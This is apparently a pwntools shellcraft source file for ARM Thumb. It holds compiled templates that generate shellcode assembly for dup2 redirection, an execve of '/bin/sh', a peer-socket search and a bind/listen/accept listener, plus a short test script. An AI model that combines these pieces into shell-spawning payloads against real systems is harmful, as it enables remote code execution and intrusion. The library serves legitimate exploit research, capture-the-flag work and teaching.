def render_body(context, sock='r6', **pageargs):
    """Mako-compiled template body (pwntools shellcraft, Thumb ``dup``).

    Emits Thumb assembly that calls ``dup2(sock, r1)`` for r1 = 2, 1, 0 by
    counting r1 down and looping while it stays non-negative (``bpl``).

    Args:
        context: Mako render context; assembly text goes to ``context.writer()``.
        sock: register name or value whose contents become the first
            ``dup2`` argument. It is passed straight to ``mov`` and is never
            escaped, so only pass values you control.
        **pageargs: extra template arguments, exported to the template namespace.

    Returns:
        ``''`` — Mako's convention; the real output is what was written.
    """
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs, sock=sock)
        _emit = context.writer()

        # Template-level imports; each is re-exported into the Mako namespace
        # by snapshotting locals() and copying the named entries over.
        from pwnlib.shellcraft import common
        _seen = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin(
            [(_name, _seen[_name]) for _name in ['common'] if _name in _seen]))
        _emit(u'\n')

        from pwnlib.shellcraft.thumb import mov
        _seen = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin(
            [(_name, _seen[_name]) for _name in ['mov'] if _name in _seen]))
        _emit(u'\n')
        _emit(u'\n')
        _emit(u'\n')

        # Fresh labels so several shellcraft snippets can be concatenated
        # without duplicate-label errors from the assembler.
        dup = common.label("dup")
        looplabel = common.label("loop")
        _seen = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin(
            [(_name, _seen[_name]) for _name in ['dup', 'looplabel'] if _name in _seen]))
        _emit(u'\n')

        # <dup>:  r1 = 2 ; r7 = SYS_dup2
        _emit(unicode(dup))
        _emit(u':\n ')
        _emit(unicode(mov('r1', 2)))
        _emit(u'\n ')
        _emit(unicode(mov('r7', 'SYS_dup2')))
        _emit(u'\n\n')

        # <loop>: r0 = sock ; svc 1 ; r1 -= 1 ; bpl <loop>
        _emit(unicode(looplabel))
        _emit(u':\n ')
        _emit(unicode(mov('r0', sock)))
        _emit(u'\n svc 1\n subs r1, #1\n bpl ')
        _emit(unicode(looplabel))
        _emit(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()
def render_body(context, **pageargs):
    """Mako-compiled template body (pwntools shellcraft, Thumb ``sh``).

    Emits Thumb assembly that performs ``execve`` with r0 pointing at the
    inline ``"/bin/sh"`` bytes, r1 pointing at a two-word stack array
    ``{r0, 0}`` and r2 = 0; r7 is loaded with ``SYS_execve`` via ``mov``.

    Args:
        context: Mako render context; assembly text goes to ``context.writer()``.
        **pageargs: extra template arguments, exported to the template namespace.

    Returns:
        ``''`` — Mako's convention; the real output is what was written.
    """
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs)
        _emit = context.writer()

        # Template-level import, re-exported into the Mako namespace.
        from pwnlib.shellcraft.thumb import mov
        _seen = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin(
            [(_name, _seen[_name]) for _name in ['mov'] if _name in _seen]))
        _emit(u'\n')

        # r0 = &execve_addr ; r2 = 0 ; r7 = SYS_execve
        _emit(u'\n\n adr r0, execve_addr\n ')
        _emit(unicode(mov('r2', 0)))
        _emit(u'\n ')
        _emit(unicode(mov('r7', 'SYS_execve')))
        # argv lives on the stack: push {r0, r2} leaves sp -> {r0, 0}.
        _emit(
            u'\n push {r0, r2}\n mov r1, sp\n svc 1\n .balign 4, 1\nexecve_addr:\n .ascii "/bin/sh"\n'
        )
        return ''
    finally:
        context.caller_stack._pop_frame()
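def render_body(context, port=None, **pageargs):
    """Mako-compiled template body (pwntools shellcraft, Thumb ``findpeer``).

    Emits Thumb assembly that walks file descriptors upward from 0, calling
    ``getpeername`` on each until one succeeds; the descriptor is kept in r6.
    When *port* is given, a second loop condition is emitted that reads the
    peer port out of the returned sockaddr and keeps searching until it
    matches ``htons(port)``.

    Args:
        context: Mako render context; assembly text goes to ``context.writer()``.
        port: optional peer port to match. It is normalised with ``int`` before
            use, so anything that is not an integer (or integer-like string)
            raises ``ValueError``/``TypeError`` before any assembly is written
            for the port check — the value is also echoed into an assembler
            comment, so it must not be free-form text.
        **pageargs: extra template arguments, exported to the template namespace.

    Returns:
        ``''`` — Mako's convention; the real output is what was written.

    Raises:
        ValueError, TypeError: from ``int(port)`` when *port* is not integer-like.
    """
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs, port=port)
        # Mako resolves builtins through the context; 'int' shadows the builtin
        # name on purpose (generated-code convention), so keep it.
        int = context.get('int', UNDEFINED)
        __M_writer = context.writer()

        # Template-level imports; each is re-exported into the Mako namespace
        # by snapshotting locals() and copying the named entries over.
        from pwnlib.shellcraft.thumb import mov
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin(
            [(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['mov'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        from pwnlib import constants
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin(
            [(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['constants'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        from socket import htons
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin(
            [(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['htons'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')

        # findpeer: r6 starts at -1 because the loop body increments first.
        __M_writer(u'\nfindpeer:\n /* File descriptor in r6 */\n /* Inside the loop we begin by incrementing it */\n /* so initially we want it to be -1 */\n ')
        __M_writer(unicode(mov('r6', -1)))
        # lr doubles as a saved stack pointer; the loop resets sp from it.
        __M_writer(u'\n /* Let us restore stack easily */\n mov lr, sp\n\nnext_socket:\n /* Next file descriptor */\n add r6, #1\n\n ')
        __M_writer(unicode(mov('r7', constants.linux.thumb.SYS_getpeername)))
        # getpeername(r6, sp+4, sp): 20 bytes of scratch are pushed, the first
        # word holding the size argument and the rest the sockaddr buffer.
        __M_writer(u'\n\n /* Reset stack */\n mov sp, lr\n\n /* First argument is file descriptor */\n mov r0, r6\n\n /* Make room on stack - inet addr structure is 16 bytes and size of addr is four bytes */\n /* First four bytes will be the size of the address, the remaining 16 bytes will be */\n /* the address structure */\n push {r0, r1, r2, r3, r4}\n\n /* Second argument is pointer to where to store inet addr */\n add r1, sp, #4\n\n /* Third argument is pointer to size */\n mov r2, sp\n\n /* Now issue system call */\n svc 1\n\n /* If the syscall returned -1 this was a bad socket */\n /* so move on to the next one */\n /* Testing on r0 has nul bytes but moving to r1 achieves the same */\n cmp r0, #0\n bne next_socket\n')

        if port is not None:
            # Normalise once, up front: the same value is both echoed into the
            # assembler comment below and fed to htons(), so a non-integer
            # fails here instead of after partial output has been written.
            port = int(port)
            # sockaddr_in: family in the low half-word, port in the high one,
            # hence the 16-bit shift after loading the first word.
            __M_writer(u'\ncompare_port:\n /* Read the port into r0 */\n ldr r1, [sp, #4]\n lsr r1, #16\n\n /* Put the port (')
            __M_writer(unicode(port))
            __M_writer(u') to search for into r1 */\n ')
            __M_writer(unicode(mov('r2', htons(port))))
            __M_writer(u'\n\n /* Is it the one we have been searching for? */\n cmp r1, r2\n \n /* If not try the next one */\n bne next_socket\n')
        return ''
    finally:
        context.caller_stack._pop_frame()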
def render_body(context, string, append_null=True, **pageargs):
    """Mako-compiled template body (pwntools shellcraft, Thumb ``pushstr``).

    Emits Thumb assembly that places *string* on the stack: the string is
    split into 4-byte words (padded with NUL), and the words are pushed in
    reverse order via ``mov r1, <word>; push {r1}`` so that — presumably, given
    a downward-growing stack — the bytes end up in memory order at ``sp``.

    Args:
        context: Mako render context; assembly text goes to ``context.writer()``.
        string: bytes to push. ``repr(string)`` is echoed into an assembler
            comment unescaped, so callers should only pass data they control.
        append_null: when true, a single ``'\\x00'`` is appended first.
        **pageargs: extra template arguments, exported to the template namespace.

    Returns:
        ``''`` normally; ``None`` on the empty-string early exit (Mako ignores
        the return value, so the inconsistency is harmless but worth knowing).
    """
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs, string=string, append_null=append_null)
        # Mako resolves builtins through the context; 'repr' shadows the builtin
        # name on purpose (generated-code convention).
        repr = context.get('repr', UNDEFINED)
        __M_writer = context.writer()

        # Template-level imports; each is re-exported into the Mako namespace
        # by snapshotting locals() and copying the named entries over.
        from pwnlib.shellcraft.thumb import mov
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['mov'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        from pwnlib.util import lists, packing
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['packing', 'lists'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')

        # NOTE(review): '+=' with a str literal assumes *string* is a str
        # (Python 2-era template, cf. the u'' literals and unicode()); a bytes
        # argument on Python 3 would raise TypeError here — confirm callers.
        if append_null:
            string += '\x00'
        # Nothing to push: emit nothing at all (not even the comment header).
        if not string:
            return
        # Re-export the possibly-modified 'string' to the template namespace.
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['string'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u' /* push ')
        __M_writer(unicode(repr(string)))
        __M_writer(u' */\n\n')
        # Group into 4-byte words ('fill' pads the last one with NUL) and walk
        # them last-to-first; each word is unpacked to an int for mov.
        for word in lists.group(4, string, 'fill', '\x00')[::-1]:
            __M_writer(u' ')
            __M_writer(unicode(mov('r1', packing.unpack(word))))
            __M_writer(u'\n push {r1}\n')
        return ''
    finally:
        context.caller_stack._pop_frame()
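def render_body(context, return_value=None, **pageargs):
    """Mako-compiled template body (pwntools shellcraft, Thumb ``ret``).

    Emits a Thumb ``bx lr``; when *return_value* is given, a ``mov r0,
    <return_value>`` is emitted first so the caller sees it as the result.

    Args:
        context: Mako render context; assembly text goes to ``context.writer()``.
        return_value: value to load into r0 before returning, or ``None`` to
            leave r0 untouched. Passed straight to ``thumb.mov`` unescaped.
        **pageargs: extra template arguments, exported to the template namespace.

    Returns:
        ``''`` — Mako's convention; the real output is what was written.
    """
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs, return_value=return_value)
        __M_writer = context.writer()

        # Template-level import, re-exported into the Mako namespace.
        from pwnlib.shellcraft import thumb
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin(
            [(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['thumb'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')
        __M_writer(u'\n\n')

        # Identity test rather than '!= None': a value whose __eq__ is
        # overloaded (e.g. array-like objects) must not be mistaken for None.
        if return_value is not None:
            __M_writer(u' ')
            __M_writer(unicode(thumb.mov('r0', return_value)))
            __M_writer(u'\n')
        __M_writer(u'\n bx lr\n')
        return ''
    finally:
        context.caller_stack._pop_frame()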
def render_body(context, port, network='ipv4', **pageargs):
    """Mako-compiled template body (pwntools shellcraft, Thumb ``listen``).

    Emits Thumb assembly for the sequence socket → bind → listen → accept:
    a ``SOCK_STREAM`` socket of family ``AF_INET`` (``network == 'ipv4'``) or
    ``AF_INET6`` (any other value) is created, bound to *port* on the wildcard
    address, put into listening state with a backlog of 1, and the accepted
    connection's descriptor is left in r6.

    Args:
        context: Mako render context; assembly text goes to ``context.writer()``.
        port: TCP port, passed to ``socket.htons`` — must be an int.
        network: ``'ipv4'`` selects ``sockaddr_in``; anything else selects
            ``sockaddr_in6`` (there is no validation of other spellings).
        **pageargs: extra template arguments, exported to the template namespace.

    Returns:
        ``''`` — Mako's convention; the real output is what was written.

    Raises:
        TypeError/OverflowError: from ``htons`` when *port* is not a valid
            16-bit integer.
    """
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs, port=port, network=network)
        __M_writer = context.writer()

        # Template-level imports; each is re-exported into the Mako namespace
        # by snapshotting locals() and copying the named entries over.
        from pwnlib.shellcraft.thumb import mov
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['mov'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        from pwnlib import constants
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['constants'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        from socket import htons
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['htons'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')

        # socket(family, SOCK_STREAM, 0); r7 = SYS_socket is loaded once and
        # then bumped with 'add r7, #n' for bind/listen/accept below — that
        # only works if those syscall numbers are consecutive on the target
        # ABI (the emitted comments assume 281..285); the numbers are not
        # checked here — TODO confirm against constants.linux.thumb.
        __M_writer(u'\n /* First create listening socket */\n ')
        __M_writer(unicode(mov('r7', constants.linux.thumb.SYS_socket)))
        __M_writer(u'\n')
        if network == 'ipv4':
            __M_writer(u' ')
            __M_writer(unicode(mov('r0', constants.linux.thumb.AF_INET)))
            __M_writer(u'\n')
        else:
            __M_writer(u' ')
            __M_writer(unicode(mov('r0', constants.linux.thumb.AF_INET6)))
            __M_writer(u'\n')
        __M_writer(u' ')
        __M_writer(unicode(mov('r1', constants.linux.thumb.SOCK_STREAM)))
        __M_writer(
            u'\n eor r2, r2\n svc 1\n\n /* Save socket in r6 */\n mov r6, r0\n\n'
        )

        if network == 'ipv4':
            # sockaddr_in is built as two stack words: {family | port << 16, 0}.
            __M_writer(
                u' /* Build sockaddr_in structure */\n /* r2 is zero == INADDR_ANY */\n /* Put port and address family into r1 */\n '
            )
            __M_writer(
                unicode(
                    mov('r1', ((htons(port) << 16) + constants.linux.thumb.AF_INET))))
            # bind(r0=socket, r1=sp, r2=16)
            __M_writer(
                u'\n push {r1, r2}\n\n /* Address of sockaddr_in into r1 */\n mov r1, sp\n\n /* sizeof(sockaddr_in) into r2 */\n mov r2, #16\n\n /* Socket already in r0 */\n /* r7 is 281 = SYS_socket, add one and it is 282 = SYS_bind */\n add r7, #1\n svc 1\n'
            )
        else:
            # NOTE(review): the emitted comment '/* Then port = %d */' is a
            # leftover format placeholder — it is never substituted and reaches
            # the assembly output verbatim. Harmless inside a comment.
            __M_writer(
                u' /* Build sockaddr_in6 structure */\n /* r2 is already zero */\n eor r1, r1\n eor r3, r3\n push {r1, r2, r3}\n push {r1, r2, r3}\n \n /* Then port = %d */\n '
            )
            __M_writer(
                unicode(
                    mov('r1', (htons(port) << 16) + constants.linux.thumb.AF_INET6)))
            # bind(r0=socket, r1=sp, r2=28)
            __M_writer(
                u'\n push {r1, r2, r3}\n\n /* Address of sockaddr_in6 into r1 */\n mov r1, sp\n\n /* sizeof(sockaddr_in6) into r2 */\n mov r2, #28\n\n /* Socket already in r0 */\n /* r7 is 281 = SYS_socket, add one and it is 282 = SYS_bind */\n add r7, #1\n svc 1\n'
            )

        # listen(r6, 1) then accept(r6, NULL, NULL); the accepted fd replaces
        # the listening socket in r6.
        __M_writer(
            u'\n /* Server socket from r6 into r0 */\n mov r0, r6\n\n /* Backlog */\n mov r1, #1\n\n /* r7 = SYS_listen = 284 */\n /* r7 is already = 282 so just add two */\n add r7, #2\n svc 1\n\n /* Server socket from r6 into r0 */\n mov r0, r6\n\n /* Other args are null */\n eor r1, r1\n eor r2, r2\n\n /* r7 = SYS_accept = 285 */\n /* r7 is already = 284 so just add one */\n add r7, #1\n svc 1\n\n /* Move accepted socket to r6 */\n mov r6, r0\n'
        )
        return ''
    finally:
        context.caller_stack._pop_frame()
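#!/usr/bin/env python3
"""Smoke script: render one Thumb ``mov`` via pwntools shellcraft and print it.

Prints the generated assembly text followed by its length in characters.
"""
import sys
from pwnlib.asm import asm, disasm
import pwnlib.shellcraft.thumb as sc

# sc.mov returns assembly *text*, not machine code; len() therefore counts
# characters of source, not bytes of encoded instructions.
data = sc.mov("r0", 0xdeadbeef)
print(data)
# Fix: the original printed len(x) with 'x' never defined (NameError).
print(len(data))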